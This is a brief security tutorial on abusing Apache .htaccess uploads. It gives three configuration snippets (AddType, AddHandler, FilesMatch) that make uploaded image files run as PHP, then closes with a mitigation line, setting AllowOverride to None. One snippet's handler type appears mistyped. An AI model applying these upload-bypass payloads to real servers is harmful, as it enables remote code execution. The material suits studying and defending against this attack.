This article is only for the purpose of learning network information defense
Distributed Configuration File
When the distributed configuration file .htaccess appears, it will override the httpd.conf global configuration file.
If file upload allows uploading the .htaccess file, it can force modification of the Apache server’s configuration.
1 2 3
# Treat .png files as .php files ## Attack method: Upload a .png file with PHP code content AddType application/x-httpd-php .png
1 2 3
# Treat files containing the PHP keyword as .php files ## Attack method: Upload an image file with the file name containing the PHP keyword <filename>.php.png AddHandler php5-script php
1 2 3 4 5
# Match a specified file name and treat it as a .php file ## Attack method: Upload an image file with the specified file name <filename>.png <FilesMatch "<filename>.png"> SetHandler application/x-http-php </FilesMatch>
Modify the AllowOverride in the Apache configuration file to None and disallow rewriting files in the Apache root directory.